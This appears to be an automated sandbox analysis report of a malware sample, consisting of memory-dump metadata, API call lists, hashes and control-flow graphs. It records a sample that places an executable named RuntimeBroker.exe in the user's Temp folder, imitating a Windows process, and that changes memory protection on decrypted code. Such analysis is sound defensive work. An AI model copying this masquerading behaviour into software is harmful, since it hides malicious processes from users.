                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle$Process$AttributesCodeCreateExitFileOpenSleep
                                                    • String ID:
                                                    • API String ID: 2606710791-0
                                                    • Opcode ID: 4465e095109e34562a7ab258df4e49aaeb65685f479cd2585f2238bd64d95dd3
                                                    • Instruction ID: 4f708015a7bd906ab3cf1baa006d86e2f184253588b53872471cec224a7a4ce4
                                                    • Opcode Fuzzy Hash: 4465e095109e34562a7ab258df4e49aaeb65685f479cd2585f2238bd64d95dd3
                                                    • Instruction Fuzzy Hash: 93415222E1DB428AF710CB68E86027973A1FF48754F484235D94DB2AAEDF3CE569C640

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: __scrt_acquire_startup_lock__scrt_get_show_window_mode__scrt_release_startup_lock_cexit_exit_get_narrow_winmain_command_line_register_thread_local_exe_atexit_callback
                                                    • String ID:
                                                    • API String ID: 3995423050-0
                                                    • Opcode ID: fa25cb70bbc0ac460ecf776212904400aa92264d06165a6d857d54fd50dba9c8
                                                    • Instruction ID: 0602ff6b2cc212e1616db905ce674fa40a85672913816e42f7590d7a0cab8857
                                                    • Opcode Fuzzy Hash: fa25cb70bbc0ac460ecf776212904400aa92264d06165a6d857d54fd50dba9c8
                                                    • Instruction Fuzzy Hash: 8D314C64E4C24391FB24AB7D9571BB92291EF55B84F4C4035E60EEB2EFDE2CE80C8211

                                                    APIs
                                                      • Part of subcall function 00007FF651792840: memmove.VCRUNTIME140(?,?,?,00007FF651791015), ref: 00007FF6517928AA
                                                      • Part of subcall function 00007FF6517913C0: GetUserNameW.ADVAPI32 ref: 00007FF65179140C
                                                      • Part of subcall function 00007FF6517913C0: memmove.VCRUNTIME140 ref: 00007FF65179154D
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF651791061
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: memmove$NameUser_invalid_parameter_noinfo_noreturn
                                                    • String ID: \AppData\Local\Temp\RuntimeBroker.exe
                                                    • API String ID: 3654858880-2057000481
                                                    • Opcode ID: 79f19905d00526ba3ce40e61f548f22a8b056df1b5f43dc48df9402481aa5e6c
                                                    • Instruction ID: 89a0196e0e12454362d3040df51cdf855764ec264ac277c49cea22e7669482cd
                                                    • Opcode Fuzzy Hash: 79f19905d00526ba3ce40e61f548f22a8b056df1b5f43dc48df9402481aa5e6c
                                                    • Instruction Fuzzy Hash: F9F081A1F19A86A1EF10DB2CE46127D1221AF843F4F841332E16DA26EF9E2CD54CC300

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: fwritememmove
                                                    • String ID:
                                                    • API String ID: 1388854176-0
                                                    • Opcode ID: 1b73adc353df8ee469e39ce0e44924bb4f7f18ed2af78d11447982f98b68e384
                                                    • Instruction ID: 9c44e996cc6bd8b476229edb1b43ae8399b5efe0d8d46356aaf197c6d201e2b6
                                                    • Opcode Fuzzy Hash: 1b73adc353df8ee469e39ce0e44924bb4f7f18ed2af78d11447982f98b68e384
                                                    • Instruction Fuzzy Hash: 1F112922B05B4586EB148F9E95202786360FB94FD4F6C0036EF0CA774ADF3DE4A68300

                                                    APIs
                                                      • Part of subcall function 00007FF651791A00: OpenProcess.KERNEL32 ref: 00007FF651791A53
                                                      • Part of subcall function 00007FF651791A00: GetExitCodeProcess.KERNELBASE ref: 00007FF651791A68
                                                      • Part of subcall function 00007FF651791A00: CloseHandle.KERNEL32 ref: 00007FF651791A75
                                                      • Part of subcall function 00007FF651791A00: CloseHandle.KERNEL32 ref: 00007FF651791A8F
                                                      • Part of subcall function 00007FF651791A00: GetFileAttributesW.KERNELBASE ref: 00007FF651791AA8
                                                      • Part of subcall function 00007FF651791A00: CreateProcessW.KERNELBASE ref: 00007FF651791B25
                                                      • Part of subcall function 00007FF651791A00: CloseHandle.KERNEL32 ref: 00007FF651791B3C
                                                      • Part of subcall function 00007FF651791A00: CloseHandle.KERNEL32 ref: 00007FF651791B46
                                                      • Part of subcall function 00007FF651791A00: SleepEx.KERNELBASE ref: 00007FF651791B51
                                                      • Part of subcall function 00007FF651792E60: ??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF651792E8D
                                                      • Part of subcall function 00007FF651792E60: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF651792EA7
                                                      • Part of subcall function 00007FF651792E60: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF651792ED9
                                                      • Part of subcall function 00007FF651792E60: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF651792F04
                                                      • Part of subcall function 00007FF651792E60: std::_Facet_Register.LIBCPMT ref: 00007FF651792F1D
                                                      • Part of subcall function 00007FF651792E60: ??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF651792F3C
                                                    • ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF651791B8B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle$Process$Lockit@std@@$??0_??1_?always_noconv@codecvt_base@std@@AttributesBid@locale@std@@CodeCreateExitFacet_FileGetcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@OpenRegisterSleepV42@@Vfacet@locale@2@std::_
                                                    • String ID:
                                                    • API String ID: 1212312986-0
                                                    • Opcode ID: 4a88758a9339877e77c4009f11d0d5f0dae864ccd5e63a23c5d9fc6f2f06fa28
                                                    • Instruction ID: 35da4f201f36778f8e3d9e2ccfdfb9ec1329a98a645722e2188075b3a2e5643d
                                                    • Opcode Fuzzy Hash: 4a88758a9339877e77c4009f11d0d5f0dae864ccd5e63a23c5d9fc6f2f06fa28
                                                    • Instruction Fuzzy Hash: 52E06521E1994181EB04AB5AF5A537963A0EF48BC4F5C4031DA4D57B4FDE3CC4A4C744

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 313767242-0
                                                    • Opcode ID: 1a83481ad1522f8b885902559ffce35783f61588aaa64065adf0bca0ce3e5ff8
                                                    • Instruction ID: 7fcd9c42dc57094f4da4e9709411012e15f40c25c6543b6bface2f6be86bc3f3
                                                    • Opcode Fuzzy Hash: 1a83481ad1522f8b885902559ffce35783f61588aaa64065adf0bca0ce3e5ff8
                                                    • Instruction Fuzzy Hash: 16315E76609B8186EB608F69E8607ED7360FB84744F48403ADA4E97B99DF3CD54CC710
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                    • String ID:
                                                    • API String ID: 2933794660-0
                                                    • Opcode ID: 5cb9591401710e660a825713dcc64f818a20f48456534f9fba00a5c7d4122e34
                                                    • Instruction ID: 19cc7922a78d14c0783c3f76b8ad6c19e1b92b5e932b3fc799b56b37cf522d55
                                                    • Opcode Fuzzy Hash: 5cb9591401710e660a825713dcc64f818a20f48456534f9fba00a5c7d4122e34
                                                    • Instruction Fuzzy Hash: 71113322B14F0589EB00CF78E8652B833A4FB19758F480D31DA6DD6759DF7CD1688340
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ba47d34bbe3b7e9c4939e468852733ce2b193c4c4515983354e78054b495e4d2
                                                    • Instruction ID: bbf76487ba0a3b81785ca1a2020b121ab6fea55803bc3dd03fa423a8fa47c9cd
                                                    • Opcode Fuzzy Hash: ba47d34bbe3b7e9c4939e468852733ce2b193c4c4515983354e78054b495e4d2
                                                    • Instruction Fuzzy Hash: 0AA0022290CC57E0E7048B2DE9734302330EF54700B9D0032C41DE186A9FBCE88DC340

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 208 7ff651792120-7ff651792155 209 7ff651792183-7ff65179218b 208->209 210 7ff651792157-7ff651792165 208->210 212 7ff651792197-7ff6517921a2 209->212 213 7ff65179218d-7ff651792192 209->213 210->209 211 7ff651792167-7ff65179217e 210->211 214 7ff6517923cf-7ff6517923f3 call 7ff651793320 211->214 215 7ff6517921c4-7ff6517921d0 212->215 216 7ff6517921a4-7ff6517921c2 212->216 213->214 218 7ff6517921ee-7ff651792215 fgetc 215->218 219 7ff6517921d2-7ff6517921e0 fgetc 215->219 216->215 223 7ff651792320 218->223 224 7ff65179221b 218->224 221 7ff6517921e6-7ff6517921e9 219->221 222 7ff6517923cd 219->222 221->222 222->214 225 7ff651792325-7ff65179232d 223->225 226 7ff651792220-7ff65179222b 224->226 225->222 227 7ff651792333-7ff651792344 225->227 228 7ff65179224d-7ff651792255 call 7ff651792f70 226->228 229 7ff65179222d-7ff65179224b 226->229 230 7ff6517923c8 call 7ff6517935bc 227->230 231 7ff65179234a-7ff65179235d 227->231 232 7ff65179225a-7ff6517922ac ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z 228->232 229->232 230->222 231->230 237 7ff65179235f-7ff651792365 _invalid_parameter_noinfo_noreturn 231->237 235 7ff6517922ae-7ff6517922b1 232->235 236 7ff6517922b7-7ff6517922c7 232->236 235->236 238 7ff651792366-7ff651792369 235->238 239 7ff65179237e-7ff651792395 236->239 240 7ff6517922cd-7ff65179231a memmove fgetc 236->240 237->238 238->223 241 7ff65179236b-7ff65179237c 238->241 242 7ff6517923bf-7ff6517923c3 239->242 243 7ff651792397 239->243 240->223 240->226 241->225 242->225 244 7ff6517923a0-7ff6517923b7 ungetc 243->244 244->242 245 7ff6517923b9-7ff6517923bd 244->245 245->244
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: fgetc
                                                    • String ID:
                                                    • API String ID: 2807381905-0
                                                    • Opcode ID: 2e99d3806bb1f5b3d0ff0c945178925e562c3c7a06867b70d4d84469f2ffba43
                                                    • Instruction ID: 4875918be15a97626bae6040a34152555a74c5604e8b9e0ce4185178829f14d3
                                                    • Opcode Fuzzy Hash: 2e99d3806bb1f5b3d0ff0c945178925e562c3c7a06867b70d4d84469f2ffba43
                                                    • Instruction Fuzzy Hash: AE818D32B18A4199EB00DF69D4902AC37B4FB48B68F581236DF5DA3B99DF38D598C310

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
                                                    • String ID:
                                                    • API String ID: 762505753-0
                                                    • Opcode ID: 4534c48d6121e506176395aa0da307aa7327604ad8d467125341fd00de69631c
                                                    • Instruction ID: c69bd7f68d94ac67eb76d93672902e6152822779defa1a7e6584270d8dd5ba2b
                                                    • Opcode Fuzzy Hash: 4534c48d6121e506176395aa0da307aa7327604ad8d467125341fd00de69631c
                                                    • Instruction Fuzzy Hash: 3E315472A08B4591EB149F19E4641697360FB88F94F4C0632EB9EA77AEDF3CE459C700

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 266 7ff651792840-7ff65179286a 267 7ff651792870-7ff651792878 266->267 267->267 268 7ff65179287a-7ff651792887 267->268 269 7ff651792974-7ff651792979 call 7ff6517912e0 268->269 270 7ff65179288d-7ff651792896 268->270 279 7ff65179297a-7ff651792991 call 7ff651791240 269->279 271 7ff651792898-7ff6517928b4 memmove 270->271 272 7ff6517928b9-7ff6517928c3 270->272 274 7ff651792960-7ff651792973 271->274 275 7ff651792904-7ff651792924 272->275 276 7ff6517928c5-7ff6517928cf 272->276 278 7ff651792926-7ff651792929 275->278 275->279 280 7ff6517928d3-7ff6517928da 276->280 278->280 281 7ff65179292b-7ff65179292e 278->281 289 7ff6517929bf-7ff6517929d7 279->289 290 7ff651792993-7ff6517929a0 279->290 282 7ff651792937-7ff65179293c call 7ff651793340 280->282 283 7ff6517928dc-7ff6517928e3 280->283 285 7ff65179293f-7ff65179295b memmove 281->285 282->285 283->279 287 7ff6517928e9-7ff6517928f4 call 7ff651793340 283->287 285->274 296 7ff651792930-7ff651792936 _invalid_parameter_noinfo_noreturn 287->296 297 7ff6517928f6-7ff651792902 287->297 293 7ff6517929a2-7ff6517929b5 290->293 294 7ff6517929ba call 7ff6517935bc 290->294 298 7ff6517929b7 293->298 299 7ff6517929d8-7ff651792a01 _invalid_parameter_noinfo_noreturn 293->299 294->289 296->282 297->285 298->294 301 7ff651792a30-7ff651792a34 299->301 302 7ff651792a03-7ff651792a0e 299->302 304 7ff651792a3e-7ff651792a4c ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ 301->304 305 7ff651792a36-7ff651792a39 call 7ff651792ba0 301->305 302->301 303 7ff651792a10-7ff651792a2e 302->303 303->301 307 7ff651792a4e-7ff651792a56 call 7ff6517935bc 304->307 308 7ff651792a5b-7ff651792a68 304->308 305->304 307->308
                                                    APIs
                                                    • memmove.VCRUNTIME140(?,?,?,00007FF651791015), ref: 00007FF6517928AA
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF651791015), ref: 00007FF651792930
                                                    • memmove.VCRUNTIME140(?,?,?,00007FF651791015), ref: 00007FF651792956
                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65179297A
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF651791015), ref: 00007FF6517929D8
                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF651792A41
                                                      • Part of subcall function 00007FF651793340: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000000100000000,00007FF65179293C,?,?,?,00007FF651791015), ref: 00007FF65179335A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturnmemmove$??1?$basic_streambuf@Concurrency::cancel_current_taskD@std@@@std@@U?$char_traits@malloc
                                                    • String ID:
                                                    • API String ID: 4151065855-0
                                                    • Opcode ID: 061e06aae32766b36eb5e371fb9f0ada9feb0741a7736276d232d951b532adef
                                                    • Instruction ID: bcdf2a91c3494de5b310c0d4e0b9174bbdb1cc50204ce345f03049e229af28a3
                                                    • Opcode Fuzzy Hash: 061e06aae32766b36eb5e371fb9f0ada9feb0741a7736276d232d951b532adef
                                                    • Instruction Fuzzy Hash: 3F51E162B0974581EB14AB29E46437C22A4EB05FF4F684731DA7DA73DADF3CD48A8300

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 2016347663-0
                                                    • Opcode ID: fc0a6e5bffcc4cd51f555edc60534f8265a9eb00ebb660565df8606e8137ac2e
                                                    • Instruction ID: a82c1fbbbc1792f007c22357a6cd4554199ccc0bce8a630ec491707e68a35d0f
                                                    • Opcode Fuzzy Hash: fc0a6e5bffcc4cd51f555edc60534f8265a9eb00ebb660565df8606e8137ac2e
                                                    • Instruction Fuzzy Hash: 8A41A262B18A4191EF10DB2AE5286BD6361EB44FE0F584732DE6D97BDADE3CD049C304

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 2016347663-0
                                                    • Opcode ID: 022bf48b0be6360237c50bed30530884a305a30fd38d806b1d6d9e03fd545b1d
                                                    • Instruction ID: 27221ade752dc7086922b364e635b6d24aecbf94b0d8e283a8f0eb50790ee2b2
                                                    • Opcode Fuzzy Hash: 022bf48b0be6360237c50bed30530884a305a30fd38d806b1d6d9e03fd545b1d
                                                    • Instruction Fuzzy Hash: 2631F021B0868194EF149F3EA65476D6362EB04FE0F584235DAAD97BCEDE3CE059C300

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c9d034aa6b88396eae2df4aade8b45d2a44d5a469a2b1ac91a975ef6a8dadbee
                                                    • Instruction ID: 17d863296a818fb28884febc5a4a1096e8e00ea34215ddcf2218550a307ae349
                                                    • Opcode Fuzzy Hash: c9d034aa6b88396eae2df4aade8b45d2a44d5a469a2b1ac91a975ef6a8dadbee
                                                    • Instruction Fuzzy Hash: 31517132608B8185DB108F2DE4603ADB3A4FB84B94F584236DA9D97BADDF3CC448C740

                                                    Execution Graph

                                                    Execution Coverage:18.3%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:3
                                                    Total number of Limit Nodes:0
                                                    execution_graph 2530 7ffd34777fbd 2531 7ffd34777fcb VirtualProtect 2530->2531 2533 7ffd347780ab 2531->2533

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 7ffd34770498 1 7ffd3477049d-7ffd3477050e 0->1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.4616695677.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffd34770000_RuntimeBroker.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: O_^2$O_^;$O_^D
                                                    • API String ID: 0-1588794792
                                                    • Opcode ID: a949e8dd27fced4ffa256a4959919ec35c6c69d91597f1b0af7e4ad49d9f7b0a
                                                    • Instruction ID: ff6b72b203469a46ac0912c1f58a1e58dc4d17f896dd941c22f25cd1c9da243f
                                                    • Opcode Fuzzy Hash: a949e8dd27fced4ffa256a4959919ec35c6c69d91597f1b0af7e4ad49d9f7b0a
                                                    • Instruction Fuzzy Hash: CCB19797B0D9D26BE621B3BD68B61FE3F84DF8323D74841B7D18CD9093DC08645A8296

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 14 7ffd347704b8 15 7ffd347704bd-7ffd3477050e 14->15
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.4616695677.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffd34770000_RuntimeBroker.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: O_^2$O_^;$O_^D
                                                    • API String ID: 0-1588794792
                                                    • Opcode ID: bc6e6e0d9f1256c483c3b60e9ae2e279a8cb7b16b5621dda30c90fc2c248de73
                                                    • Instruction ID: f124b2de91e7d3ff9c5f9e0c70c6c0425087e4eb6450cae8472894f259548941
                                                    • Opcode Fuzzy Hash: bc6e6e0d9f1256c483c3b60e9ae2e279a8cb7b16b5621dda30c90fc2c248de73
                                                    • Instruction Fuzzy Hash: 40B19997B0D9D26BE621B3BD68B61FE3F84DF8323974841B7D1CCD9093DC08645A8295

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 24 7ffd34770530 25 7ffd34770535-7ffd3477053e 24->25
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.4616695677.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffd34770000_RuntimeBroker.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: O_^2$O_^;$O_^D
                                                    • API String ID: 0-1588794792
                                                    • Opcode ID: 881c10ede67154e54113404ceed2c6371271f375660a0274d87b33dc4e073bcf
                                                    • Instruction ID: 5dcc79e673d783581eea5144d416f19aec45ae3d9e2eb54e199eba9f943ec326
                                                    • Opcode Fuzzy Hash: 881c10ede67154e54113404ceed2c6371271f375660a0274d87b33dc4e073bcf
